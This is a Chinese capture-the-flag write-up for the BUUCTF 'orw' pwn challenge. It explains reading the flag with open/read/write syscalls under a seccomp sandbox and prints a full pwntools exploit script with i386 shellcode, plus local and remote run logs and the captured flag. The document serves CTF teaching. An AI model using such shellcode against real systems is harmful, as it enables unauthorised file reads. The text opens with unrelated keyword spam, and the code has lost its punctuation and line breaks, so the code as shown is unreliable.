网站的前台后台,如何规避电子政务网站建设教训,网站备案情况查询,自己做网站推广在那个网站1.题目信息
BUUCTF在线评测 下载orw时防病毒要关闭 2.题目分析
orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护#xff0c;并不能getshell。只能通过orw的方式拿到flag。
fdopen#xff08;‘./flag’); # 打开flag文件#xff0c;得到fd…1.题目信息
BUUCTF在线评测 下载orw时防病毒要关闭 2.题目分析
orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护并不能getshell。只能通过orw的方式拿到flag。
fdopen‘./flag’); # 打开flag文件得到fd
readfdbuf0x30); #通过fd将flag的内容读到内存中
write1buf0x30); #将内存中的flag内容输出到屏幕 在相关目录里面写入以下内容
holyeyesubuntu:~/Re/6$ echo flag{testtest} ./flag holyeyesubuntu:~/Re/6$
3.解题脚本
rootpwn_test1604:/ctf/work/6# ls
orw orw.i64 orw.py
rootpwn_test1604:/ctf/work/6# python
Python 2.7.12 (default, Nov 12 2018, 14:36:49)
[GCC 5.4.0 20160609] on linux2
Type help, copyright, credits or license for more information../flag.encode(hex)
2e2f666c6167./flag\x00\x00.encode(hex)
2e2f666c616700003.1只用修改的内容
context.archi386DEBUG 1LOCAL True
BIN ./orw
HOST node5.buuoj.cn
PORT 25178def exploit(p):p.recv()pl xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80p.sendline(asm(pl))p.interactive()return
3.2全部脚本
#!/usr/bin/env python
# -*- coding: utf-8 -*-from pickle import TRUE
from pwn import *
import syscontext.terminal[tmux,sp,-h]
context.log_leveldebug
context.archi386DEBUG 1LOCAL True
BIN ./orw
HOST node5.buuoj.cn
PORT 25178def get_base_address(proc):return int(open(/proc/{}/maps.format(proc.pid), rb).readlines()[0].split(-)[0], 16)def debug(bps,_s):script handle SIGALRM ignore\nPIE get_base_address(p)script set $_base 0x{:x}\n.format(PIE)for bp in bps:script b *0x%x\n%(PIEbp)script _sgdb.attach(p,gdbscriptscript)# pwn,caidan,leak,libc
# recv recvuntil send sendline sendlineafter sendafter
#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabdef exploit(p):p.recv()pl xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80p.sendline(asm(pl))p.interactive()returnif __name__ __main__:elf ELF(BIN)if len(sys.argv) 1:LOCAL Falsep remote(HOST, PORT)exploit(p)else:LOCAL Truep process(BIN)log.info(PID: str(proc.pidof(p)[0]))# pauseif DEBUG:debug([],)exploit(p) 3.3 运行本地
rootpwn_test1604:/ctf/work/6# tmux
rootpwn_test1604:/ctf/work/6# python orw.py
rootpwn_test1604:/ctf/work/6# python orw.py [25/25]│ f 1 f765ab23 __read_nocancel25 [0/48]
[DEBUG] PLT 0x8048370 read │ f 2 8048582 main58
[DEBUG] PLT 0x8048370 read │ f 3 f759d637 __libc_start_main247
[DEBUG] PLT 0x8048380 printf │pwndbg c
[DEBUG] PLT 0x8048390 __stack_chk_fail │Continuing.
[DEBUG] PLT 0x80483a0 __libc_start_main │
[DEBUG] PLT 0x80483b0 prctl │Program received signal SIGSEGV, Segmentation fault.
[DEBUG] PLT 0x80483c0 __gmon_start__ │0x0804a0a8 in shellcode ()
[*] /ctf/work/6/orw │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATAArch: i386-32-little │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────RELRO: Partial RELRO │ EAX 0x30Stack: Canary found │ EBX 0x1NX: NX disabled │ ECX 0xffbd74b4 ◂— 0x67616c66 (flag)PIE: No PIE (0x8048000) │ EDX 0x30RWX: Has RWX segments │ EDI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
[] Starting local process ./orw: pid 179 │ ESI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */
[*] PID: 179 │ EBP 0xffbd74c8 ◂— 0x0
[DEBUG] Wrote gdb script to /tmp/pwn1jT2Ys.gdb │ ESP 0xffbd74b4 ◂— 0x67616c66 (flag)file ./orw │ EIP 0x804a0a8 (shellcode72) ◂— 0xa /* \n */handle SIGALRM ignore │────────────────────────────────────────[ DISASM ]────────────────────────────────────────set $_base 0x8048000 │ ► 0x804a0a8 shellcode72 or al, byte ptr [eax]
[*] running in new terminal: /usr/bin/gdb -q ./orw 179 -x /tmp/pwn1jT2Ys.gdb │ 0x804a0aa shellcode74 add byte ptr [eax], al
[DEBUG] Launching a new terminal: [/usr/bin/tmux, sp, -h, /usr/bin/gdb -q ./orw 1│ 0x804a0ac shellcode76 add byte ptr [eax], al
79 -x /tmp/pwn1jT2Ys.gdb] │ 0x804a0ae shellcode78 add byte ptr [eax], al
[] Waiting for debugger: Done
[DEBUG] Received 0x17 bytes: [0/25]│ f 1 f765ab23 __read_nocancel25 [0/48]Give my your shellcode: │ f 2 8048582 main58
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/inc│ f 3 f759d637 __libc_start_main247
ludes /dev/stdin │pwndbg c
[DEBUG] Assembling │Continuing..section .shellcode,awx │.global _start │Program received signal SIGSEGV, Segmentation fault..global __start │0x0804a0a8 in shellcode ()_start: │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA__start: │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────.intel_syntax noprefix │ EAX 0x30xor eax, eax │ EBX 0x1xor ebx, ebx │ ECX 0xffbd74b4 ◂— 0x67616c66 (flag)xor ecx, ecx │ EDX 0x30xor edx, edx │ EDI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */push 0x00006761 │ ESI 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 0x1b1db0 */push 0x6c662f2e │ EBP 0xffbd74c8 ◂— 0x0mov eax, 5 #open(./flag) │ ESP 0xffbd74b4 ◂— 0x67616c66 (flag)mov ebx, esp │ EIP 0x804a0a8 (shellcode72) ◂— 0xa /* \n */mov ecx, 0 │────────────────────────────────────────[ DISASM ]────────────────────────────────────────mov edx, 0 │ ► 0x804a0a8 shellcode72 or al, byte ptr [eax]int 0x80 │ 0x804a0aa shellcode74 add byte ptr [eax], almov ebx, eax │ 0x804a0ac shellcode76 add byte ptr [eax], almov eax, 3 #read(fd,esp,0x30) │ 0x804a0ae shellcode78 add byte ptr [eax], almov ecx, esp │ 0x804a0b0 shellcode80 add byte ptr [eax], almov edx, 0x30 │ 0x804a0b2 shellcode82 add byte ptr [eax], alint 0x80 │ 0x804a0b4 shellcode84 add byte ptr [eax], almov eax, 4 #write(1,esp,0x30) │ 0x804a0b6 shellcode86 add byte ptr [eax], almov ebx, 1 │ 0x804a0b8 shellcode88 add byte ptr [eax], almov ecx, esp │ 0x804a0ba shellcode90 add byte ptr [eax], almov edx, 0x30 │ 0x804a0bc shellcode92 add byte ptr [eax], alint 0x80 │────────────────────────────────────────[ STACK ]─────────────────────────────────────────
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-bw_t9d/step2 /tmp/pwn-asm-bw_t9d/s│00:0000│ ecx esp 0xffbd74b4 ◂— 0x67616c66 (flag)
tep1 │01:0004│ 0xffbd74b8 ◂— 0x7365747b ({tes)
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-bw_t9d/step3 │02:0008│ 0xffbd74bc ◂— 0x73657474 (ttes)
/tmp/pwn-asm-bw_t9d/step4 │03:000c│ 0xffbd74c0 ◂— 0xf70a7d74
[DEBUG] Sent 0x49 bytes: │04:0010│ 0xffbd74c4 —▸ 0xffbd74e0 ◂— 0x100000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│ │05:0014│ ebp 0xffbd74c8 ◂— 0x000000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│ │06:0018│ 0xffbd74cc —▸ 0xf759d637 (__libc_start_main247) ◂— add esp, 0x1000000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 │····│····│····│···0│ │07:001c│ 0xffbd74d0 —▸ 0xf7737000 (_GLOBAL_OFFSET_TABLE_) ◂— mov al, 0x1d /* 000000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│ │x1b1db0 */00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│ │──────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────── 00000049 │ ► f 0 804a0a8 shellcode72
[*] Switching to interactive mode │ f 1 67616c66
[DEBUG] Received 0x30 bytes: │ f 2 7365747b00000000 66 6c 61 67 7b 74 65 73 74 74 65 73 74 7d 0a f7 │flag│{tes│ttes│t}··│ │ f 3 7365747400000010 e0 74 bd ff 00 00 00 00 37 d6 59 f7 00 70 73 f7 │·t··│····│7·Y·│·ps·│ │ f 4 f70a7d7400000020 00 70 73 f7 00 00 00 00 37 d6 59 f7 01 00 00 00 │·ps·│····│7·Y·│····│ │ f 5 ffbd74e000000030 │ f 6 f759d637 __libc_start_main247
flag{testtest} │Program received signal SIGSEGV (fault address 0x30)
\xff\x00\x00\x00\x007psps\x007\x00$ 3.4 运行远程
rootpwn_test1604:/ctf/work/6# python orw.py 1
rootpwn_test1604:/ctf/work/6# tmux
[exited]
rootpwn_test1604:/ctf/work/6# python orw.py 1
[DEBUG] PLT 0x8048370 read
[DEBUG] PLT 0x8048380 printf
[DEBUG] PLT 0x8048390 __stack_chk_fail
[DEBUG] PLT 0x80483a0 __libc_start_main
[DEBUG] PLT 0x80483b0 prctl
[DEBUG] PLT 0x80483c0 __gmon_start__
[*] /ctf/work/6/orwArch: i386-32-littleRELRO: Partial RELROStack: Canary foundNX: NX disabledPIE: No PIE (0x8048000)RWX: Has RWX segments
[] Opening connection to node5.buuoj.cn on port 25178: Done
[DEBUG] Received 0x17 bytes:Give my your shellcode:
[DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin
[DEBUG] Assembling.section .shellcode,awx.global _start.global __start_start:__start:.intel_syntax noprefixxor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80
[DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-C0CcaA/step2 /tmp/pwn-asm-C0CcaA/step1
[DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-C0CcaA/step3 /tmp/pwn-asm-C0CcaA/step4
[DEBUG] Sent 0x49 bytes:00000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│00000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│00000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 │····│····│····│···0│00000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│00000049
[*] Switching to interactive mode
[DEBUG] Received 0x30 bytes:00000000 66 6c 61 67 7b 31 30 33 37 66 34 39 62 2d 33 30 │flag│{103│7f49│b-30│00000010 36 63 2d 34 30 34 32 2d 38 34 31 31 2d 34 38 34 │6c-4│042-│8411│-484│00000020 39 32 64 61 35 37 30 36 62 7d 0a f7 01 00 00 00 │92da│5706│b}··│····│00000030
flag{1037f49b-306c-4042-8411-48492da5706b}
\x0[DEBUG] Received 0x2b bytes:timeout: the monitored command dumped core\n
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$ 3.5 避坑提醒
用kali2023的虚机环境不行要用ubuntu16.04的虚机环境就可以。
